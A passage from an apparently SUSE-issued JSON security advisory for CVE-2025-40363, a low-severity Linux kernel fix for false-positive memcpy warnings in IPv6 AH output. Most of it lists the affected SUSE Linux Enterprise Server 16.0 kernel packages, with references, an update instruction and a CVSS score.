"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: ipv6: fix field-spanning memcpy warning in AH output\n\nFix field-spanning memcpy warnings in ah6_output() and\nah6_output_done() where extension headers are copied to/from IPv6\naddress fields, triggering fortify-string warnings about writes beyond\nthe 16-byte address fields.\n\n memcpy: detected field-spanning write (size 40) of single field \"\u0026top_iph-\u003esaddr\" at net/ipv6/ah6.c:439 (size 16)\n WARNING: CPU: 0 PID: 8838 at net/ipv6/ah6.c:439 ah6_output+0xe7e/0x14e0 net/ipv6/ah6.c:439\n\nThe warnings are false positives as the extension headers are\nintentionally placed after the IPv6 header in memory. Fix by properly\ncopying addresses and extension headers separately, and introduce\nhelper functions to avoid code duplication.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40363",
"url": "https://www.suse.com/security/cve/CVE-2025-40363"
},
{
"category": "external",
"summary": "SUSE Bug 1255102 for CVE-2025-40363",
"url": "https://bugzilla.suse.com/1255102"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 2.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
